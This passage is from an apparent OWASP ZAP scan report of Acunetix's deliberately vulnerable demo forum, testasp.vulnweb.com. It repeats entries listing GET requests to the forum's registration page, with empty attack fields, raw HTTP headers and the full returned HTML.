not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web 